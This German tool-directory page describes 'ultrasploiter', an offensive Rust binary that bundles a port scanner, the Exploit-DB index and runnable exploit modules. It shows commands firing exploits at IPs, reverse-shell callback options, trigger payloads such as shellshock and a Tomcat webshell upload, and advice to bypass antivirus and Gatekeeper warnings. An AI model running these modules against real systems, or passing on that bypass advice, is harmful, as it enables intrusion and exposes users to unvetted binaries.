Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
ultrasploiter — Eine einzelne Binärdatei, die einen Portscanner, den vollständigen Exploit-DB-Index (47k Einträge) und ausführbare Exploit-Module in einem Tool vereint. In Rust geschrieben, läuft auf Linux, Windows und macOS. | Kitploit
Tools/GitLabGitLab/vqkro/ultrasploiter
Penetrationstest-FrameworksAufklärungSchwachstellenscannerExploit-FrameworksNetzwerkkartierungPort-ScanningExploitationWebanwendungs-ExploitationInformationsbeschaffungCommand and ControlRed Teaming
10vor 13h 46mNoch nicht geprüft
Payload-Entwicklung
GitLabvqkro/ultrasploiter

ultrasploiter

Eine einzelne Binärdatei, die einen Portscanner, den vollständigen Exploit-DB-Index (47k Einträge) und ausführbare Exploit-Module in einem Tool vereint. In Rust geschrieben, läuft auf Linux, Windows und macOS.

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

UltraSploiter

scannen, abgleichen, ausnutzen — eine IP rein, Shells raus.

Ein einzelnes Binary, das einen Portscanner, den vollständigen Exploit-DB-Index und eine Reihe ausführbarer Exploit-Module in einem Werkzeug vereint. Läuft auf Linux, Windows und macOS.

Aufgabenormalerweisehier
Dienste auf einem Host findennmapUltraSploiter scan <ip>
Exploits nachschlagensearchsploitUltraSploiter search <kw>
Sie abfeuernmsfconsoleUltraSploiter exploit <ip> <module>

UltraSploiter menu


Installation

Der einfachste und beste Weg ist, einfach das vorgefertigte Binary zu nehmen und es auszuführen. Nichts zu installieren, keine Abhängigkeiten — eine eigenständige Datei.

Download von der Releases-Seite:

  • Windows — UltraSploiter-windows-x86_64.exe → Doppelklick
  • Linux — UltraSploiter-linux-x86_64
  • macOS — noch kein vorgefertigtes Binary; mit einem Befehl selbst bauen (siehe unten)

Achtung: Sicherheitswerkzeuge werden markiert. Windows SmartScreen und Antivirus werden das Binary wahrscheinlich warnen oder in Quarantäne verschieben — klicke auf Weitere Informationen → Trotzdem ausführen, oder füge eine Ausnahme hinzu, wenn du es behalten willst.

Windows

Doppelklicke auf UltraSploiter.exe. Das Menü öffnet sich.

Wenn SmartScreen vor einem unbekannten Herausgeber warnt (was bei jedem unsignierten Binary passiert), klicke auf Weitere Informationen → Trotzdem ausführen.

Linux

chmod +x UltraSploiter-linux-x86_64
./UltraSploiter-linux-x86_64

macOS

chmod +x UltraSploiter-macos-arm64
./UltraSploiter-macos-arm64

Wenn Gatekeeper es blockiert (wiederum: jedes unsignierte Binary), entweder Rechtsklick → Öffnen, oder das Quarantäne-Flag einmalig entfernen:

xattr -d com.apple.quarantine UltraSploiter-macos-arm64

Aus dem Quellcode bauen

Nur nötig, wenn es kein Binary für deine Plattform gibt oder du es ändern willst. Rust 1.74+ ist erforderlich.

Linux

sudo apt install build-essential    # gcc + linker (Debian/Ubuntu)
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
./build.sh                          # -> ./UltraSploiter

macOS

xcode-select --install              # clang + linker
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
./build.sh                          # -> ./UltraSploiter

Windows

git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
.\build.ps1                         # -> UltraSploiter.exe

build.ps1 verwendet die Toolchain stable-x86_64-pc-windows-gnu, die mit MinGW linkt — du brauchst also kein Visual Studio oder MSVC. Sie installiert diese Toolchain, falls sie fehlt. Wenn du bereits MSVC Build Tools hast, funktioniert auch ein einfaches cargo build --release.

Windows + GNU Hinweis: windows-sys (von tokio hereingezogen) ruft dlltool auf, das wiederum den Assembler as aufruft — und die rust-mingw- Komponente liefert as nicht mit. build.ps1 sucht nach einem MinGW-bin, das es enthält, in %~dp0tools\mingw64\bin und %USERPROFILE%\tools\mingw64\bin, und stellt es PATH voran, wenn es gefunden wird. Lege dort einen winlibs-Build ab, wenn du auf error calling dlltool stößt. MSVC-Toolchains sind nicht betroffen.


Ausführen

Ohne Argumente bekommst du das Menü:

   1)  Scan a target           find open ports and services
   2)  Search exploits         keyword lookup
   3)  List runnable modules
   4)  Run an exploit          pick a target and a module
   5)  Console                 advanced msf-style commands
   0)  Exit

Kommandozeile

UltraSploiter scan 10.0.0.5                      # top 1000 ports + fingerprint + suggestions
UltraSploiter scan 10.0.0.5 -p 1-1024 -T4        # range, fast timing
UltraSploiter scan 10.0.0.5 -p -                 # all 65535 ports
UltraSploiter scan 10.0.0.5 -sU                  # UDP scan
UltraSploiter scan 10.0.0.5 --json
UltraSploiter scan 10.0.0.5 -oX out.xml
UltraSploiter search samba
UltraSploiter info 17491
UltraSploiter show 17491                          # print the PoC source for an Exploit-DB id
UltraSploiter modules
UltraSploiter msf search smb                      # bridge to Metasploit (needs it installed)
UltraSploiter exploit 10.0.0.5 vsftpd_234
UltraSploiter exploit 10.0.0.5 shellshock -o lhost=10.0.0.1 -o lport=4444
UltraSploiter console

Unter Linux/macOS mit ./ davor (z. B. ./UltraSploiter scan 10.0.0.5).

Scan-Flags

FlagBedeutung
-p <spec>top (1000), 80,443, 1-1024, - (alle)
-T0..-T5Timing-Template — langsamer/leiser bis schneller/lauter
-sUUDP-Probe-Scan
-sVDienst-/Versionserkennung (standardmäßig an)
--no-bannerBanner-Grabbing überspringen
--jsonJSON nach stdout
-oX <file>XML im nmap-Stil

Der Scanner ist asynchron (tokio): jede -T-Stufe legt fest, wie viele Sockets gleichzeitig unterwegs sind (bis zu 8000 bei -T5), sodass er die nmap-Top-1000 in ein paar Sekunden abdeckt. Jedes „offen" ist ein abgeschlossener TCP-Handshake, die Ergebnisse sind also exakt.

Optionen (-o key=value)

Schlüsselverwendet vonBedeutung
lhost, lportRev-Shell-ModuleCallback-Adresse
rportWeb-Moduleüberschreibt den HTTP-Port
pathshellshock, struts, phpunitEndpunkt-Pfad
user, passtomcat_managerManager-Zugangsdaten
coresolr_rceSolr-Core-Name
filegrafana_lfizu lesende Datei
ssh_pubkeyredis_unauthSchlüssel, der in authorized_keys abgelegt wird
src, dstproftpd_modcopyQuelle / Ziel kopieren
timeoutalleSocket-Timeout in Sekunden

Exploit-Datenbank

search und info basieren auf dem vollständigen Exploit-DB-Index — über 47.000 Einträge (derselbe Datensatz, den searchsploit verwendet), eingebettet ins Binary. Wenn ein Eintrag eine CVE trägt, die ein ausführbares Modul implementiert, verknüpft info die beiden:

$ UltraSploiter info 17491
Exploit-DB 17491
  description  vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)
  codes        OSVDB-73573;CVE-2011-2523

  [runnable] vsftpd_234
  UltraSploiter exploit <ip> vsftpd_234

Ausführbare Module (37)

ModulCVEAuslöser
vsftpd_234CVE-2011-2523:)-Benutzername → Root-Bind-Shell auf 6200
unrealircd_backdoorCVE-2010-2075AB; <cmd> über IRC
distcc_execCVE-2004-2687DIST-Protokoll-Compiler-Argument
proftpd_modcopyCVE-2015-3306SITE CPFR/CPTO Dateikopie
redis_unauth—CONFIG SET schreibt einen Key oder Cron-Eintrag
shellshockCVE-2014-6271User-Agent: () { :; }; <cmd>
struts2_5638CVE-2017-5638OGNL in Content-Type
tomcat_putCVE-2017-12615PUT einer JSP-Webshell
tomcat_manager—Deployment eines WAR über /manager
elasticsearch_groovyCVE-2015-1427Groovy-RCE in _search
drupalgeddon2CVE-2018-7600Form-API-Render-Callback
phpunit_evalCVE-2017-9841eval-stdin.php
jenkins_scriptCVE-2019-1003000unauthentifiziertes /script Groovy
solr_rceCVE-2019-17558Velocity-Template in stream.body
grafana_lfiCVE-2021-43798Plugin-Path-Traversal-Dateilesen
webmin_backdoorCVE-2019-15107password_change.cgi leitet einen Wert in eine Shell
php_cgi_arg_injectionCVE-2012-1823-d auto_prepend_file über den Query-String
Tool herunterladen